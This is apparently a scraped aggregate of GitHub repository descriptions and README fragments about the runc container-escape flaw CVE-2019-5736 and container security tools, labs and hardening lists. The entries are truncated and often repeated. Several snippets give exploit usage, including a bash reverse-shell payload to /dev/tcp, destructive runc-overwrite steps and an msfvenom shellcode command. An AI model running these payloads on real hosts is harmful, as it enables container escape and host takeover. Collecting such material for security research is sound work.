CVE-2019-5736

Damn Vulnerable Kubernetes Application (DVKA) DVKA is a series of apps deployed on Kubernetes that are damn vulnerable The content of this repository is devided in two sections Challenges Practice your Kubernetes exploitation skills by solving these fun challenges Challenge 1 - Hack The NFT Museum Challenge 2 - Enterprise Grade Network Debugging Console Workshop Learn ever

runc Introduction runc is a CLI tool for spawning and running containers on Linux according to the OCI specification Releases You can find official releases of runc on the release page All releases are signed by one of the keys listed in the runckeyring file in the root of this repository Security The reporting process and disclosure communications are outlined here

"# CVE_2019_5736"

Resource for identified attacks against Docker, Kubernetis, Containers Vulnerabilities and Exploitation techniques

Awesome-Docker-Kubernetis-Containers-Vulnerabilities-and-Exploitation Threat Hunting Resource for identified attacks against Docker, Kubernetis, Containers Vulnerabilities and Exploitation techniques Docker Vulnerability Assessment Tools 1 githubcom/PercussiveElbow/docker-escape-tool Dokcer-escape tool usage Do

docker_escape \docker_escape Display usage information Checks: \docker_escape check Determine if the environment is a Docker container Automatic escape: \docker_escape auto Attempt automatic escape If successful this starts a privileged container with the host drive mounted at /hostOS Manual esca

Cloud computing refers to the delivery of computing services, including storage, processing power, and software, over the internet. Instead of owning and maintaining physical servers or hardware, users can access and use these resources on-demand from a cloud service provider.

Cloud-Pentest Cloud computing refers to the delivery of computing services, including storage, processing power, and software, over the internet Instead of owning and maintaining physical servers or hardware, users can access and use these resources on-demand from a cloud service provider What is the cloud? | Cloud definition : wwwcloudflarecom/learning/cloud/what

Damn Vulnerable Kubernetes App (DVKA) is a series of apps deployed on Kubernetes that are damn vulnerable.

Damn Vulnerable Kubernetes Application (DVKA) DVKA is a series of apps deployed on Kubernetes that are damn vulnerable The content of this repository is divided into two sections Challenges Practice your Kubernetes exploitation techniques by solving these fun challenges Challenge 1 - Hack The NFT Museum Challenge 2 - Enterprise Grade Network Debugging Console Workshop Lear

PoC for CVE-2019-5736

CVE-2019-5736-PoC PoC for CVE-2019-5736 Created with help from @singe, @_cablethief, and @feexd Tested on Ubuntu 1804, Debian 9, and Arch Linux Docker versions 18091-ce and 18031-ce This PoC does not currently work with Ubuntu 1604 and CentOS Go checkout the exploit code from Dragon Sector (the people who discovered the vulnerability) here What is it? This is a Go imp

Repo for BAWIM project

DOCKER SECURITY - LABORATORIA PREZENTACJA Przed rozpoczęciem Przed rozpoczęciem pracy z laboratoriami należy pobrać oraz uruchomić maszynę wirtualną: maszyna Maszynę należy uruchomić w programie VMware Zadanie 1 Odzyskaj z warstw obrazu flagę Link do obrazu Zadanie 2 Uzyskaj dostęp na konto root za pomocą podatności CVE 2019-5736 Wszystkie pliki potrzebne do w

Hack The Box Guide by Alen Peric: The Notebook IP: 101010230 Summary: The Notebook introduces us to jwt token manipulation Lots of interesting lessons on base64 encoding/decoding, constructing cookies and manipulating them Great insight into transferring files using netcat This machine also shows us how to manipulate the docker exec environment for privilege escalation T

NVIDIA Container Runtime for Docker Documentation The full documentation and frequently asked questions are available on the repository wiki An introduction to the NVIDIA Container Runtime is also covered in our blog post Quickstart Make sure you have installed the NVIDIA driver and a supported version of Docker for your distribution (see prerequisites) If you have a cus

Kira's Blog

Kira 的博客 Docker 使用 Docker 搭建 Keepalived 高可用集群 Harbor Auth Token 分析 Docker Registry manifest 分析 Docker Registry 鉴权验证分析 Golang Golang 的启动过程分析 Golang runtimegetg() 的实现 Golang 中不使用分代和紧凑型 GC 的原因 Go runtime 调度器 Kubernetes runc 启动容器过程分析（附 CVE-2019-5736 实现过程

Docker runc CVE-2019-5736 exploit Dockerfile. Credits : https://github.com/Frichetten/CVE-2019-5736-PoC.git

Docker-Runc-Exploit Docker runc CVE-2019-5736 exploit Dockerfile Credits : githubcom/Frichetten/CVE-2019-5736-PoCgit

CVE-2019-5736 implemented in a self-written container runtime to understand the exploit.

CVE-2019-5736-Custom-Sandbox General CVE-2019-5736 implemented using a shallow, self-written container runtime to understand the exploit Exploit is based on (and almost all copied from) the runc-poc by twistlock: githubcom/twistlock/RunC-CVE-2019-5736/tree/master/malicious_image_POC Container Runtime (quarantine) See code docs for further details Usage: quarantine [O

Proof of concept code for breaking out of docker via runC

Breaking out of Docker via RunC A proof of concept code for CVE-2019-5736 This POC is heavily based on YuvalAvra's POC I do not claim any credit for the code utilised in this POC More information about this vulnerability and a demonstration of how it can be exploited can be found in the worksheet Information in the worksheet is based a blog post by Twistlock Labs Usage

Exploit for the CVE-2019-5736 runc vulnerability

cve-2019-5736-exp This is a proof-of-concept (PoC) exploit for the CVE-2019-5736 vulnerability in runc, the runtime used in Docker Disclaimer I undertook this project as an exercise, for educational reasons and for fun It should go without saying that I do not support unethical and/or illegal misuse of this code Description The vulnerability was discovered by Adam Iwaniuk an

Docker runc CVE-2019-5736 exploit Dockerfile. Credits : https://github.com/Frichetten/CVE-2019-5736-PoC.git

Docker-Runc-Exploit Docker runc CVE-2019-5736 exploit Dockerfile Credits : githubcom/Frichetten/CVE-2019-5736-PoCgit

Hack The Box Guide by Alen Peric: The Notebook IP: 101010230 Summary: The Notebook introduces us to jwt token manipulation Lots of interesting lessons on base64 encoding/decoding, constructing cookies and manipulating them Great insight into transferring files using netcat This machine also shows us how to manipulate the docker exec environment for privilege escalation T

My personal awesome list based on GitHub stars

Awesome Stars A curated list of my GitHub stars! Generated by stargazed 🏠 Contents ANTLR (1) ActionScript (1) Assembly (5) Batchfile (1) C (115) C# (26) C++ (135) CMake (2) COBOL (2) CSS (65) Clojure (15) CodeQL (1) CoffeeScript (7) Coq (1) Crystal (5) Dart (7) Dhall (1) Dockerfile (5) EJS (2) Elixir (8) Elm (4) Erlang (3) F# (10) FreeMarker (1) Gherkin (1) Gnuplot (1)

Docker commands

Docker, Containers, Snyk and Kubernetes Docker Dockerfile Build Multi-Stage Builds Run CMD, RUN and ENTRYPOINT Local credentials Docker Compose Image introspection Containers Copy Clean-up Sidecar design pattern circleci Pass values from Docker Container to Host Set environment variable Conditional Jobs local setup circleci setup Validate config file Build a linear or mat

🖥️ -k4u5h41- #️⃣ CVE-2019-5736 Usage : machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736) Download file maingo, change the payload in the file into: var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10101412/1234 0>&1" After that, run: go build mai

$50 Million CTF from Hackerone - Writeup

$50 million CTF Writeup Summary For a brief overview of the challenge you can take a look at the following image: Below I will detail each step that I took to solve the CTF, moreover all the bad assumptions that led me to a dead end in some cases Twitter The CTF begins with this tweet: What is this binary? My first thought was try to decode the binary on image’s backg

https://nvd.nist.gov/vuln/detail/CVE-2019-5736 poc of CVE-2019-5736

CVE-2019-5736-PoC nvdnistgov/vuln/detail/CVE-2019-5736 poc of CVE-2019-5736

Docker commands

Docker, Containers, Snyk and Kubernetes Docker Dockerfile Build Multi-Stage Builds Run CMD, RUN and ENTRYPOINT Local credentials Docker Compose Image introspection Containers Copy Clean-up Sidecar design pattern circleci Pass values from Docker Container to Host Set environment variable Conditional Jobs local setup circleci setup Validate config file Build a linear or mat

A dockerfile and docker compose orchestration to setup a business of a gambling system and website using laravel

BetDocker A vulnerable Docker container simulating a gambling website business Comes with Docker Compose files for easy setup and guidance, installed with a Netcat backdoor, a LDAP server and a hosted Laravel website DISCLAIMER This is an insecure Docker container which should only be used for local environments The scenario was used with an insecure version of Docker susce

A quick way to manage various payloads and listeners

venom A quick way to manage various payloads and listeners Summary venompy is a tool that help you manage payloads and listeners ⬢ venom /venompy ▌ ▐·▄▄▄ ▐ ▄ • ▌ ▄ · ▪█·█▌▀▄▀·•█▌▐█▪ ·██ ▐███▪ ▐█▐█•▐▀▀▪▄▐█▐▐▌ ▄█

runc容器逃逸漏洞预警

Usage Edit HOST inside payloadc, compile with make Start nc and run pwnsh inside the container Notes This exploit is destructive: it'll overwrite /usr/bin/docker-runc binary on the host with the payload It'll also overwrite /bin/sh inside the container Tested only on Debian 9 No attempts were made to make it stable or reliable, it's only tested to work wh

CVE-2019-5736 参考：cve-2019-5736-poc (1) edit poc command in stage2cve (2) build docker docker build -t cve (3) run docker docker run -d cve /bin/bash -c "tail -f /dev/null" (4) backup docker-runc cp /usr/bin/docker-runc /usr/bin/docker-runcbak (5) docker exec -it docker-id /bin/bash (6) edit runsh libseccomp edition Exp:cd /root/libseccomp-251 (7)

CVE patches for legacy runc packaged with Docker

CVE Builds for legacy docker-runc This repo provides a backport of patches for CVE-2019-5736 for older versions of runc that were packaged with Docker Build and Releases Refer to the releases section of this repo for the binaries In order to build yourself, or build for different architectures, just run make and the binaries will end up in /dist The binaries will be of the

CVE-2019-5736 POCs

RunC-CVE-2019-5736 Two PoCs for CVE-2019-5736 See Twistlock Labs for an explanation of CVE-2019-5736 and the PoCs The malicious image PoC is heavily based on q3k’s PoC, so all credit goes to him Running the PoCs Note that running the PoCs will overwrite the runc binary on the host It is recommened that you create a copy of your runc binary (commonly at /usr/sbin/runc)

🖥️ -k4u5h41- #️⃣ CVE-2019-5736 Usage : machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736) Download file maingo, change the payload in the file into: var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10101412/1234 0>&1" After that, run: go build mai

Exploit code

DOCKER-2019-5736 Exploit code for CVE-2019-5736 accessredhatcom/security/cve/cve-2019-5736 The container escape for Docker The exploit overwriting and executing the host systems runc binary from container Tested on Ubuntu 1604 and distro based Arch Docker versions 1806 go build maingo

NVIDIA Container Runtime for Docker Documentation The full documentation and frequently asked questions are available on the repository wiki An introduction to the NVIDIA Container Runtime is also covered in our blog post Quickstart Make sure you have installed the NVIDIA driver and a supported version of Docker for your distribution (see prerequisites) If you have a cus

NP Govware 2019 Demos

Govware 2019 Exploit Demos Intro This repository attempts to implement the following exploits for Govware 2019: Oracle WebLogic Server CVE-2019-2725 Docker Runc CVE-2019-5736 with docker containers Setup Prequisites for all exploits: Install docker and docker-compose Instructions for Running demos: Change directory to exploit (see Project Structure) cd <exploit di

Docker auditing and enumeration script.

Blowhole Blowhole is a Python-based script that enumerates Docker container configurations and calls Dockerized auditing tools (Batten and Docker Security Benchmark) to investigate Docker configurations and settings on the host machine Usage python blowholepy -h usage: blowholepy [-h] [-i] [-a] -o OUTDIR Blowhole optional arguments: -h, --help show this help m

CVE-2019-5736 This is exploit code for CVE-2019-5736 (and it works for both runc and LXC) The simplest way to use it is to copy the exploit code into an existing container, and run makesh However, you could just as easily create a bad image and run that % docker run --rm --name pwnme -dit ubuntu:1810 bash pwnme % docker cp CVE-2019-5736tar pwnme:/CVE-2019-5736tar

Usage Edit HOST inside payloadc, compile with make Start nc and run pwnsh inside the container Notes This exploit is destructive: it'll overwrite /usr/bin/docker-runc binary on the host with the payload It'll also overwrite /bin/sh inside the container Tested only on Debian 9 No attempts were made to make it stable or reliable, it's only tested to work wh

website address: qingshan-cloud-securityuerappspotcom/ lab1 Write an “AppEngine Standard” App A simple event management website based on Flask + GCP All HTML and JavaScript is served statically to keep secure Users can upload events and dates, or delete events The website could update the remaining time of the event in real time and delete expire

Kubesploit Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent dedicated for containerized environments written in Golang and built on top of Merlin project by Russel Van Tuyl (@Ne0nd0g) Our Motivation While researching Docker and Kubernetes, we noticed that most of the tools available today are aimed at passive scanning for

Demo shop service shown in the KubeCon talk (Prevent Embarrassing Cluster Takeovers with This One Simple Trick!)

KubeCon EU 2023 Talk - Demo Shop Service Hello, hello! Welcome to Kuberwear Emporium, where your T-shirt dreams come true! ☸️ This is the repo that houses the kubernetes config as well as the different app versions demoed at KubeConEU 2023 at the talk Prevent Embarrassing Cluster Takeovers with This One Simple Trick!, where we covered how misconfiguration can make services

Description of the Project goes here

CVE-2019-5736-attack-and-security-mechanism Description of the Project goes here

A simple exploit that uses dirtypipe to inject shellcode into runC entrypoint to implement container escapes.

CVE-2022-0847 A simple exploit that uses dirtypipe to inject shellcode into runC entrypoint to implement container escapes Usage Produce base64 encoded shellcode using msf: $ msfvenom -p linux/x64/exec CMD="<command>" -f base64 Compile and run in the container, the overwritten filename is the bin that runC will ex

Awesome Container Security List of awesome resources about container security, including books, blogs, videos, tools, and cases for Docker and Kubernetes Table of Contents 🐳 Docker Security ☸️ Kubernetes Security 🐳 Docker Security Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blo

An ongoing & curated collection of awesome software, libraries and frameworks, best guidelines and technical resources and cool stuff about Docker Security.

Docker Security An ongoing & curated collection of awesome software, libraries and frameworks, best guidelines and technical resources and cool stuff about Docker Security Docker is a software platform that allows you to build, test, and deploy applications quickly Docker packages software into standardized units called containers that have everything the software n

🖥️ -k4u5h41- #️⃣ CVE-2019-5736 Usage : machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736) Download file maingo, change the payload in the file into: var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10101412/1234 0>&1" After that, run: go build mai

NVIDIA Container Runtime for Docker Documentation The full documentation and frequently asked questions are available on the repository wiki An introduction to the NVIDIA Container Runtime is also covered in our blog post Quickstart Make sure you have installed the NVIDIA driver and a supported version of Docker for your distribution (see prerequisites) If you have a cus

CVE-2019-5736 reproducer This allows you to confirm RunC-CVE-2019-5736 works on your KVM instance Workflow overview Build the dockerio related packages vulerable to CVE-2019-5736 in this repo Launch an Ubuntu 1804 KVM instance on LXD Install the vulnerable *deb packages in the VM Try the procedure introduced at RunC-CVE-2019-5736 Build vulnerable *deb packages $ docker-c

PoC-CVE-2019-5736 PoC for CVE-2019-5736

실행전 (1) stage2c에 IP주소를 호스트에 주소로 바꿉니다 (2) DockerFile로 만듭니다 docker build -t cve (3) docker run -d -t --name cvetest cve (4) 실행하기전 runc바이너리를 백업합니다 cp /usr/bin/docker-runc /usr/bin/docker-runcbak (5) docker exec -it cve /bin/bash 실행합니다 (6) in docker run cd /root && /ru

CVE-2019-5736 POCs

RunC-CVE-2019-5736 Two PoCs for CVE-2019-5736 See Twistlock Labs for an explanation of CVE-2019-5736 and the PoCs The malicious image PoC is heavily based on q3k’s PoC, so all credit goes to him Running the PoCs Note that running the PoCs will overwrite the runc binary on the host It is recommened that you create a copy of your runc binary (commonly at /usr/sbin/runc)

Modified version of CVE-2019-5736-PoC by Frichetten

Docker breakout via runc Originally from : githubcom/Frichetten/CVE-2019-5736-PoC This repo is simply me messing around with the PoC and attempting to figure the exploit's flow

A container image that exfiltrates the underlying container runtime to a remote server

whoc A container image that extracts the underlying container runtime and sends it to a remote server Poke at the underlying container runtime of your favorite CSP container platform! WhoC at Defcon 29 Cloud Village Azurescape - whoc-powered research, the first cross-account container takeover in the public cloud (70,000$ bounty) How does it work? As shown by runc CVE-2019-5

Awesome Docker Security List of awesome resources about docker security included books, blogs, video, tools and cases Table of Contents Books Blogs Videos Tools Cases Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blogs OWASP Docker Security Introduction to Container Security Understanding

5G Telco Lab based on OpenShift

OpenShift 5G Telco Lab 1 - Introduction The 5G Mobile Network standard is built from the ground up to be cloud-native Over the years, and thanks to new standards, not only the legacy architectures have been decoupled (CUPS), but even more flexible initiatives (O-RAN) are now taking over the market Many Telcos are moving to containerized architectures and ditching for good the

In this project, we found a recent attack through the malicious container and implemented a security mechanism to stop it.

CVE-2019-5736-attack-and-security-mechanism In this project, we found a recent attack through the malicious container and implemented a security mechanism to stop it Introduction Cyber-attacks have become a critical challenge for both companies and small businesses, largely due to vulnerabilities in various components of their IT resources Understanding these threats is the f

🖥️ -n3rdh4x0r- #️⃣ CVE-2019-5736 Usage : machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736) Download file maingo, change the payload in the file into: var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10101412/1234 0>&1" After that, run: go build m

CLI tool for spawning and running containers according to the OCI specification

runc Introduction runc is a CLI tool for spawning and running containers on Linux according to the OCI specification Releases You can find official releases of runc on the release page All releases are signed by one of the keys listed in the runckeyring file in the root of this repository Security The reporting process and disclosure communications are outlined here

Web Pentesting

Web-Pentesting General presentation of HTTP and Web What is a web server A web server is an application that runs on the back-end server, which handles all of the HTTP traffic from the client-side browser, routes it to the requests destination pages, and finally responds to the client-side browser Web servers usually run on TCP ports 80 or 443, and are responsible for connecti

Each container also gets its own network stack, meaning that a container doesn't get privileged access to the sockets or interfaces of another container. Of course, if the host system is setup accordingly, containers can interact with each other through their respective network interfaces just like they can interact with external hosts.

Awesome Docker Security List of awesome resources about docker security included books, blogs, video, tools and cases Table of Contents Books Blogs Videos Tools Cases Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blogs Docker Security OWASP Docker Security Introduction to Container Securit

📚 A curated list of awesome Docker security resources

awesome-docker-security（Docker 安全资源大全） 这里收集了关于 Docker 安全的优秀资源，包括书籍、博客、视频、工具以及案例。 书籍 Liz Rice 著《容器安全》 Adrian Mouat 著《Docker 安全》 Chiheb Chebbi 著《高级基础设施渗透测试》 博客 Docker 安全 OWASP Docker 安全 容器安全简介：理解 Docker 的隔离�

A curated list of awesome Docker security resources

Awesome Docker Security List of awesome resources about docker security included books, blogs, video, tools and cases Table of Contents Books Blogs Videos Tools Cases Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blogs Docker Security OWASP Docker Security Introduction to Container Securi

WorldFirst (Public) Docker API Exploit - My security researches involving Docker and Openshift

dockerevil A simple repository to store my security flaws in the docker technology 2016 - 2017 Docker API Privilege Escalation(LPE/RPE) Escalate from Offline Server/Minimal Images/Build from TAR Dockerfile Docker SUDO Privilege Escalation (PoC) Nmap Scripts 2019 CodeStudent1995 Based Exploit OpenShift Privilege Escalation(oc) Other awesome security flaws found in the do

Resources for CloudNative security research

Cloud Native Security Resources for Cloud Native Security Research, such as Docker, Kubernetes, etc Pull request welcome Intro 2021:"The Zero Trust Security Practice" by Kevin Chen - article, CN 2020:"Cloud Native Security: Container Security Practice" by Pray3r - article, CN Series of articles: Exploring Container Security by Google - articles Kernel and

Resources for CloudNative security research

Cloud Native Security Resources for Cloud Native Security Research, such as Docker, Kubernetes, etc Pull request welcome Intro 2021:"The Zero Trust Security Practice" by Kevin Chen - article, CN 2020:"Cloud Native Security: Container Security Practice" by Pray3r - article, CN Series of articles: Exploring Container Security by Google - articles Kernel and

a go security module for container runtime

go-containersec a go security module for container runtime Protect CVE-2024-21626 If you want to update runc to 1112, you can choose dmz as the entrypoint of the container: dmz entrypoint arg0 arg1 Another way to protect CVE-2019-5736 lifubang/runc#62 To use this similar way to protect CVE-2024-21626, we still have a little work to do, it will be comming soon

Docker Escape Tool Work In Progress This tool will help identify if you're in a Docker container and try some quick escape techniques to help assess the security of your containers This tool is focused specifically on Docker escapes though some of the logic may apply to other container runtimes I intend to follow this up with a blog post on helping secure your Docker co

Some POCs or Exploits for vulnerabilities

Exploit for CVE-2019-5736 Version 1 (inspired by original idea DragonSector) use a maliciousso(which used by runc) with malicious entry point (like #!/proc/self/exe) to hijack the execution of runc, and then open '/proc/self/exe' to hold the file descriptor Then 'fork-exec' to run another process, and the child process will inherit the file descriptor F

云原生(容器云)安全测试镜像

Cloud-Native-Security-Test 容器云测试镜像制作，文章链接 镜像准备 下载构建环境（我已经打包到github） mkdir -p /root/docker/ cd /root/docker/ git clone githubcom/ShadowFl0w/Cloud-Native-Security-Testgit 准备其他工具 cd /root/docker/Cloud-Native-Security-Test #下载Tomcat wget archiv

Awesome Docker Security List of awesome resources about docker security included books, blogs, video, tools and cases Table of Contents Books Blogs Videos Tools Cases Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blogs Docker Security OWASP Docker Security Introduction to Container Securi

Markdown guide and best practices to harden Docker images

How to harden a Docker image: a tutorial for beginners This tutorial provides a basic overview of Docker and its security mechanisms, discusses best practices for creating Docker containers, and surveys a number of scanning and monitoring software to harden Docker images Table of Contents 1 How does Docker work? 2 How do Docker images interact with the host? 3 How are Docke

RunC-CVE-2019-5736 Video: bitly/2WqvILb Blog Post: [wwwidealhaxblogspotcom/2020/05/breaking-out-of-docker-via-runchtml] Here, I like to mention that the original developer of this exploit is Yuval Avrahami at Twistlock Labs Running the POCs Note that running the POCs will overwrite the runC binary on the host It is highly recommened that you create a copy

RunC-CVE-2019-5736 Video: bitly/2WqvILb Blog Post: [wwwidealhaxblogspotcom/2020/05/breaking-out-of-docker-via-runchtml] Here, I like to mention that the original developer of this exploit is Yuval Avrahami at Twistlock Labs Running the POCs Note that running the POCs will overwrite the runC binary on the host It is highly recommened that you create a copy

Docker Security Checklist For a more thorough checklist please refer to the latest Docker CIS benchmark Patching Ensure you patch your Docker daemon/containerd etc to protect against escape CVEs such as CVE-2019-5736 CVE-2019-14271 CVE-2020–15257 Follow appropriate Docker security updates Image security Conduct image vulnerability scanning using an appropriate scann

Docker Security Checklist For a more thorough checklist please refer to the latest Docker CIS benchmark Patching Ensure you patch your Docker daemon/containerd etc to protect against escape CVEs such as CVE-2019-5736 CVE-2019-14271 CVE-2020–15257 Follow appropriate Docker security updates Image security Conduct image vulnerability scanning using an appropriate scann

📚 A curated list of awesome Docker security resources

Awesome Docker Security List of awesome resources about docker security included books, blogs, video, tools and cases Table of Contents Books Blogs Videos Tools Cases Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blogs Docker Security OWASP Docker Security Introduction to Container Securi

Tool to test if you're in a Docker container and attempt simple breakouts

Docker Escape Tool Work In Progress This tool will help identify if you're in a Docker container and try some quick escape techniques to help assess the security of your containers This tool is focused specifically on Docker escapes though some of the logic may apply to other container runtimes I intend to follow this up with a blog post on helping secure your Docker co

🌏 [WIP]整理好了之后迁移到 cdk-team/document，包含各类容器、K8s攻防场景的CDK文档。

CDK - Zero Dependency Container Penetration Toolkit English | 简体中文 Legal Disclaimer Usage of CDK for attacking targets without prior mutual consent is illegal CDK is for security testing purposes only Overview CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency It c

CDK - Zero Dependency Container Penetration Toolkit English | 简体中文 Legal Disclaimer Usage of CDK for attacking targets without prior mutual consent is illegal CDK is for security testing purposes only Overview CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency It c

Bitdefender introspection PoC for VBH This project demonstrates protection for three types of exploits: SMEP/SMAP disabling vDSO modifications runc overwrite SMEP/SMAP disable Overview SMEP: If set, execution of code in a higher ring generates a fault SMAP: If set, access of data in a higher ring generates a fault A malicious program may disable SMAP in order to access dat

THIS IS A C2 FRAMEWORK

cybertection_server Example Workflow Kali Terminal 1: python3 cybertection_serverpy Kali Terminal 2: python3 cybertection_agentpy GUI: Select agent, type whoami, click "Send"—see root Exploit: Choose "CVE-2021-4034," click "Run Exploit"—check output Log: Click "View Log," filter "cve" to review HOW TO USE Cop

A curated list of starred project sorted by languages

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASP Assembly Batchfile C C# C++ CMake CSS Cirru Clojure CoffeeScript Common Lisp Cuda D Dart Dockerfile Elixir Emacs Lisp Erlang F# Gherkin Gnuplot Go Groovy HCL HTML Haskell Inno Setup Java JavaScript Jsonnet Julia Jupyter Notebook Kotlin LLVM Lua Makefile Mathematica Nim OCaml Objective-C Othe

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

2019年网上阅读过的文章记录

以下是我2019年12个月每个月阅读的汇总,文章大多数国外安全文章标题翻译的中文； 渗透 Exchange在渗透测试中的利用 文章中有些好的脚本提供，而不是单单爆破 2019 OSINT指南 渗透的本质是信息收集，永不放弃，有一段时间你会感觉到你已经探索了获取信息的所有可能性。不要放弃。休�

A container analysis and exploitation tool for pentesters and engineers.

Break out the Box (BOtB) BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies What does it do? BOtB is a CLI tool which allows you to: Exploit common container vulnerabilities Perform common container post exploitation actions Provide capability when certain tools or b

Slides, Cheatsheet and Resources from our Blackhat EU talk

'Reverse Engineering and Exploiting Builds in the Cloud' Conference Material Repository This repository contains material and slides for the talk Reverse Engineering and Exploiting Builds in the Cloud: cheatsheetmd contains multiple commands, Dockerfiles, YML configs that can assist you in your build environment reversing slidespdf are the presentation slides Rec

概览 产品简介 产品概念 使用须知 产品价格 名词解释 使用必读 入门必读 集群版本 维护说明 版本跟踪 126 版本说明 集群管理 创建集群 查看集群 删除集群 通过 Kubectl 管理集群 kubectl 命令行简介 安装及配置 kubectl 使用 web kubectl 集群更新凭证 创建 PVC 创建 Service StatefulSet 示例 ku

概览 产品简介 产品概念 使用须知 产品价格 名词解释 使用必读 入门必读 集群版本 维护说明 版本跟踪 126 版本说明 集群管理 创建集群 查看集群 删除集群 通过 Kubectl 管理集群 kubectl 命令行简介 安装及配置 kubectl 使用 web kubectl 集群更新凭证 创建 PVC 创建 Service StatefulSet 示例 ku